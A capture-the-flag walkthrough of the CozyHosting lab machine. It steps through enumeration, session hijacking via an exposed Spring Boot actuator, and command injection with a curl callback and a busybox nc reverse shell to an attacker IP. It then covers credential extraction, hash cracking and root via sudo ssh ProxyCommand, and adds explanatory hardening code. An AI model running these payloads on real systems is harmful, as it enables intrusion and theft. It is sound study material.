Proof of Concept
10.129.18.74
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Initial Access
Accessing the web service on port 80 redirects to http://cozyhosting.htb
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Configure /etc/hosts
┌──(kali㉿kali)-[~/CozyHosting]
└─$ cat /etc/hosts
<SNIP>
10.129.18.74 cozyhosting.htb
Web directory enumeration finds an error page
┌──(kali㉿kali)-[~/CozyHosting]
└─$ feroxbuster -u http://cozyhosting.htb -t 100
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb/
🚩 In-Scope Url │ cozyhosting.htb
🚀 Threads │ 100
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
204 GET 0l 0w 0c http://cozyhosting.htb/logout
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
500 GET 1l 1w 73c http://cozyhosting.htb/error
<SNIP>
Visiting http://cozyhosting.htb/error shows a "Whitelabel Error Page", the default fallback error page of Spring Boot, so the back end is a Spring Boot application
<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Sun Feb 08 15:33:37 UTC 2026</div><div>There was an unexpected error (type=None, status=999).</div></body></html>
Download a Spring Boot endpoint wordlist
┌──(kali㉿kali)-[/usr/share/seclists/Discovery/Web-Content]
└─$ sudo wget https://git.selfmade.ninja/zer0sec/SecLists/-/raw/master/Discovery/Web-Content/spring-boot.txt
[sudo] password for kali:
--2026-02-08 10:51:24-- https://git.selfmade.ninja/zer0sec/SecLists/-/raw/master/Discovery/Web-Content/spring-boot.txt
Resolving git.selfmade.ninja (git.selfmade.ninja)... 95.111.201.95
Connecting to git.selfmade.ninja (git.selfmade.ninja)|95.111.201.95|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1890 (1.8K) [text/plain]
Saving to: ‘spring-boot.txt’
spring-boot.txt 100%[===================================================================================================>] 1.85K --.-KB/s in 0s
2026-02-08 10:51:25 (6.55 MB/s) - ‘spring-boot.txt’ saved [1890/1890]
Enumerate Spring Boot endpoints
┌──(kali㉿kali)-[~/CozyHosting]
└─$ feroxbuster -u http://cozyhosting.htb -t 100 -w /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt -q -s 200
200 GET 1l 1w 15c http://cozyhosting.htb/actuator/health
200 GET 1l 1w 48c http://cozyhosting.htb/actuator/sessions
200 GET 1l 1w 634c http://cozyhosting.htb/actuator
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/lang
200 GET 1l 120w 4957c http://cozyhosting.htb/actuator/env
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/home
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/path
200 GET 1l 108w 9938c http://cozyhosting.htb/actuator/mappings
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 73l 470w 37464c http://cozyhosting.htb/assets/img/values-1.png
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 1l 542w 127224c http://cozyhosting.htb/actuator/beans
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 1l 625w 55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 7l 1222w 80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 14l 1684w 143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
200 GET 2018l 10020w 95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 7l 2189w 194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200 GET 285l 745w 12706c http://cozyhosting.htb/
Scanning: http://cozyhosting.htb/
The /actuator/sessions endpoint returns a live session for the user kanderson
┌──(kali㉿kali)-[~/CozyHosting]
└─$ curl http://cozyhosting.htb/actuator/sessions
{"36A94B2FB8F3C82868F8CFB4E96BA113":"kanderson"}
Reusing that session ID as the JSESSIONID cookie gives access to the admin page
┌──(kali㉿kali)-[~/CozyHosting]
└─$ curl -X GET http://cozyhosting.htb/admin \
-H "Cookie: JSESSIONID=36A94B2FB8F3C82868F8CFB4E96BA113" -I
HTTP/1.1 200
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 09 Feb 2026 12:01:05 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Language: en-US
Clicking Submit on the admin page sends a POST to the /executessh endpoint with the host and username parameters
<form action="/executessh" method="post">
<div class="row mb-3">
<label class="col-sm-2 col-form-label">Connection settings</label>
<div class="col-sm-10">
<div class="form-floating mb-3">
<input name="host" class="form-control" id="host" placeholder="example.com">
<label for="host">Hostname</label>
</div>
<div class="form-floating mb-3">
<input name="username" class="form-control" id="username" placeholder="user">
<label for="username">Username</label>
</div>
</div>
</div>
<div class="text-center">
<button type="submit" class="btn btn-primary">Submit</button>
<button type="reset" class="btn btn-secondary">Reset</button>
</div>
</form>
Command injection found in the username parameter
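Why the request that follows works, and what a fixed handler looks like. This is an added Python example, not the CozyHosting application's code (the back end is a Spring Boot jar whose source the page does not show). It assumes the handler interpolates username and host into one shell command line; `echo` stands in for the ssh binary so the block runs anywhere, and `${IFS}` is used in the payload because the shell expands it to whitespace and field-splits it, so the parameter never has to carry a literal space.

```python
import re
import subprocess

# Constructed for this example: `echo` stands in for the ssh binary so the
# block runs on any machine and simply reflects the argv it receives.
SSH_BINARY = "echo"

# Allow-lists: POSIX-style user names and DNS-style host names only.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def execute_ssh_vulnerable(host: str, username: str) -> str:
    """The injectable pattern: parameters concatenated into one string that
    /bin/sh parses, so ';', '|', '$( )' and '${IFS}' in the input are shell
    syntax, not data."""
    cmd = f"{SSH_BINARY} {username}@{host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_ssh_argv(host: str, username: str) -> str:
    """No shell: the user-controlled text is passed as a single argv entry and
    reaches the program verbatim, metacharacters included."""
    return subprocess.run([SSH_BINARY, f"{username}@{host}"],
                          capture_output=True, text=True).stdout


def validate(host: str, username: str) -> bool:
    """Allow-list check; anything outside the character classes is rejected."""
    return bool(USERNAME_RE.fullmatch(username)) and bool(HOST_RE.fullmatch(host))


def execute_ssh_hardened(host: str, username: str) -> str:
    """Allow-list first, then argv-style execution (defence in depth)."""
    if not validate(host, username):
        raise ValueError("rejected host or username")
    return run_ssh_argv(host, username)


def build_payload(command: str, user: str = "root") -> str:
    """Shape the page's requests use: close the username with ';', replace
    spaces with ${IFS} (expanded to whitespace and field-split by the shell),
    and end with ';' so whatever the app appends runs as a separate command."""
    return f"{user};{command.replace(' ', '${IFS}')};"


if __name__ == "__main__":
    payload = build_payload("echo INJECTED")
    print("payload   :", payload)
    print("vulnerable:", execute_ssh_vulnerable("127.0.0.1", payload).split())
    print("argv only :", run_ssh_argv("127.0.0.1", payload).strip())
    print("hardened  :", validate("127.0.0.1", payload))
```

With the vulnerable builder the injected `echo INJECTED` actually runs; with argv-style execution the same payload is handed to the program as the literal string `root;echo${IFS}INJECTED;@127.0.0.1`, and the allow-list rejects it before that point.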
- request
┌──(kali㉿kali)-[~/CozyHosting]
└─$ curl http://cozyhosting.htb/executessh -H "Cookie: JSESSIONID=36A94B2FB8F3C82868F8CFB4E96BA113" -d 'host=127.0.0.1&username=root;curl${IFS}http://10.10.14.17:5555;'
- response
┌──(kali㉿kali)-[~/CozyHosting]
└─$ rlwrap nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.18.74] 33640
GET / HTTP/1.1
Host: 10.10.14.17:5555
User-Agent: curl/7.81.0
Accept: */*
Using the command injection to execute a reverse shell command
┌──(kali㉿kali)-[~/CozyHosting]
└─$ curl http://cozyhosting.htb/executessh \
-H "Cookie: JSESSIONID=36A94B2FB8F3C82868F8CFB4E96BA113" \
-d 'host=127.0.0.1&username=root;busybox${IFS}nc${IFS}10.10.14.17${IFS}4444${IFS}-e${IFS}sh;'
Reverse shell connected
┌──(kali㉿kali)-[~/CozyHosting]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.18.74] 32774
Lateral Movement
cloudhosting-0.0.1.jar found in the /app directory
app@cozyhosting:/app$ ls -al
ls -al
total 58856
drwxr-xr-x 2 root root 4096 Aug 14 2023 .
drwxr-xr-x 19 root root 4096 Aug 14 2023 ..
-rw-r--r-- 1 root root 60259688 Aug 11 2023 cloudhosting-0.0.1.jar
Unpack cloudhosting-0.0.1.jar (a jar is a zip archive)
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ unzip cloudhosting-0.0.1.jar
Archive: cloudhosting-0.0.1.jar
creating: META-INF/
inflating: META-INF/MANIFEST.MF
creating: org/
creating: org/springframework/
creating: org/springframework/boot/
creating: org/springframework/boot/loader/
inflating: org/springframework/boot/loader/ClassPathIndexFile.class
inflating: org/springframework/boot/loader/ExecutableArchiveLauncher.class
inflating: org/springframework/boot/loader/JarLauncher.class
inflating: org/springframework/boot/loader/LaunchedURLClassLoader$DefinePackageCallType.class
inflating: org/springframework/boot/loader/LaunchedURLClassLoader$UseFastConnectionExceptionsEnumeration.class
inflating: org/springframework/boot/loader/LaunchedURLClassLoader.class
inflating: org/springframework/boot/loader/Launcher.class
inflating: org/springframework/boot/loader/MainMethodRunner.class
inflating: org/springframework/boot/loader/PropertiesLauncher$ArchiveEntryFilter.class
inflating: org/springframework/boot/loader/PropertiesLauncher$ClassPathArchives.class
inflating: org/springframework/boot/loader/PropertiesLauncher$PrefixMatchingArchiveFilter.class
inflating: org/springframework/boot/loader/PropertiesLauncher.class
inflating: org/springframework/boot/loader/WarLauncher.class
creating: org/springframework/boot/loader/archive/
inflating: org/springframework/boot/loader/archive/Archive$Entry.class
inflating: org/springframework/boot/loader/archive/Archive$EntryFilter.class
inflating: org/springframework/boot/loader/archive/Archive.class
<SNIP>
Among the extracted files, a password is found in ./BOOT-INF/classes/application.properties
- Vg&nvzAQ7XxR
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ grep -i -r password .
./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-fill">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-line">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-fill"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-line"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot: binary file matches
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-line:before { content: "\eed0"; }
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.ttf: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class: binary file matches
<SNIP>
DB connection details found in ./BOOT-INF/classes/application.properties
- postgres:Vg&nvzAQ7XxR
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ cat ./BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
Connecting to the postgres DB with the recovered credentials
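Before using the credentials, note that the properties file above is the root cause of the whole initial-access chain: `management.endpoints.web.exposure.include` publishes env, beans, sessions and mappings on the application port, `management.endpoint.sessions.enabled` is what made the kanderson session readable, and the datasource password is packaged in plaintext inside the jar (Spring Boot's env endpoint masks keys containing "password" by default, which is why the jar rather than /actuator/env is where the plaintext came from). The following added Python script, which is not part of the writeup or the application, audits a copy of those lines and emits a corrected set; the separate loopback-only management port and the `${DB_PASSWORD}` placeholder are this example's suggestions, not something the page states.

```python
from typing import Dict, List

# Copied from the application.properties dump above (the lines that matter here).
SAMPLE_PROPERTIES = """\
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
"""

# Actuator endpoints that hand out secrets, live sessions or internals to
# anyone who can reach them unauthenticated.  Only 'health' belongs on a
# public-facing port.
SENSITIVE_ACTUATORS = {"env", "beans", "sessions", "mappings", "heapdump",
                       "threaddump", "configprops", "loggers", "shutdown"}


def parse_properties(text: str) -> Dict[str, str]:
    """Minimal .properties reader: key=value (spaces around '=' allowed),
    '#'/'!' comment lines and blank lines ignored."""
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def audit(props: Dict[str, str]) -> List[str]:
    """Return one finding per misconfiguration that mattered on this box."""
    findings: List[str] = []
    include = props.get("management.endpoints.web.exposure.include", "")
    exposed = {e.strip() for e in include.split(",") if e.strip()}
    if "*" in exposed:
        findings.append("all actuator endpoints exposed over HTTP")
    leaky = sorted(exposed & SENSITIVE_ACTUATORS)
    if leaky:
        findings.append("sensitive actuator endpoints exposed: " + ", ".join(leaky))
    if props.get("management.endpoint.sessions.enabled", "").lower() == "true":
        findings.append("sessions endpoint enabled: live JSESSIONIDs are readable")
    password = props.get("spring.datasource.password", "")
    if password and not password.startswith("${"):
        findings.append("plaintext datasource password packaged in the jar")
    if "management.server.port" not in props:
        findings.append("actuator served on the application port, not a separate one")
    return findings


def hardened(props: Dict[str, str]) -> Dict[str, str]:
    """Corrected settings (this example's suggestions, not from the page)."""
    fixed = dict(props)
    fixed["management.endpoints.web.exposure.include"] = "health"
    fixed["management.endpoint.sessions.enabled"] = "false"
    # Assumed layout: actuator on its own loopback-only port that the nginx
    # front end does not proxy.
    fixed["management.server.port"] = "8081"
    fixed["management.server.address"] = "127.0.0.1"
    # Resolve the secret from the environment at start-up instead of baking
    # it into the artifact.
    fixed["spring.datasource.password"] = "${DB_PASSWORD}"
    return fixed


if __name__ == "__main__":
    props = parse_properties(SAMPLE_PROPERTIES)
    for finding in audit(props):
        print("[!]", finding)
    print("--- hardened ---")
    for key, value in hardened(props).items():
        print(f"{key}={value}")
```

Run against the sample it reports four findings; run against its own hardened output it reports none, which is the check to keep in a build pipeline so a jar with an exposed sessions or env endpoint never ships.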
app@cozyhosting:/app$ psql -h 127.0.0.1 -p 5432 -U postgres
psql -h 127.0.0.1 -p 5432 -U postgres
Password for user postgres: Vg&nvzAQ7XxR
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
postgres=#
List databases
postgres=# SELECT datname FROM pg_database;
SELECT datname FROM pg_database;
datname
-------------
postgres
cozyhosting
template1
template0
(4 rows)
The cozyhosting database contains the hosts and users tables
postgres=# \c cozyhosting
\c cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=# \dt
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)
The users table holds bcrypt password hashes, including the admin account's
cozyhosting=# select * from users;
select * from users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)
Crack the hash (bcrypt, hashcat mode 3200)
- manchesterunited
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt --quiet
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
Check /etc/passwd for users with a login shell: josh
app@cozyhosting:/app$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
<SNIP>
app:x:1001:1001::/home/app:/bin/sh
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
josh:x:1003:1003::/home/josh:/usr/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
SSH in as josh, reusing the password cracked above
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ sshpass -p 'manchesterunited' ssh josh@10.129.18.74
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Feb 9 01:06:01 PM UTC 2026
System load: 0.0078125
Usage of /: 54.1% of 5.42GB
Memory usage: 14%
Swap usage: 0%
Processes: 247
Users logged in: 0
IPv4 address for eth0: 10.129.18.74
IPv6 address for eth0: dead:beef::250:56ff:feb0:8052
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
josh@cozyhosting:~$
Read user.txt
josh@cozyhosting:~$ cat user.txt
7e8b933b96ee3ef6d689cfb1756a4d8d
josh@cozyhosting:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:80:52 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.18.74/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2456sec preferred_lft 2456sec
inet6 dead:beef::250:56ff:feb0:8052/64 scope global dynamic mngtmpaddr
valid_lft 86397sec preferred_lft 14397sec
inet6 fe80::250:56ff:feb0:8052/64 scope link
valid_lft forever preferred_lft forever
Privilege Escalation
Check sudo privileges
- ssh can be run as root with arbitrary arguments
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
Abuse the root-level ssh rule to get a root shell. ssh runs ProxyCommand through /bin/sh as the invoking user, which under sudo is root; 0<&2 1>&2 attaches the spawned shell to the terminal, since ProxyCommand's stdin and stdout are otherwise pipes back to ssh, and x is a dummy hostname
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
Read root.txt
# cat root.txt
97ea88dce79b4d31142b51be3a0381a9
# ip ad
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:80:52 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.18.74/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2217sec preferred_lft 2217sec
inet6 dead:beef::250:56ff:feb0:8052/64 scope global dynamic mngtmpaddr
valid_lft 86397sec preferred_lft 14397sec
inet6 fe80::250:56ff:feb0:8052/64 scope link
valid_lft forever preferred_lft forever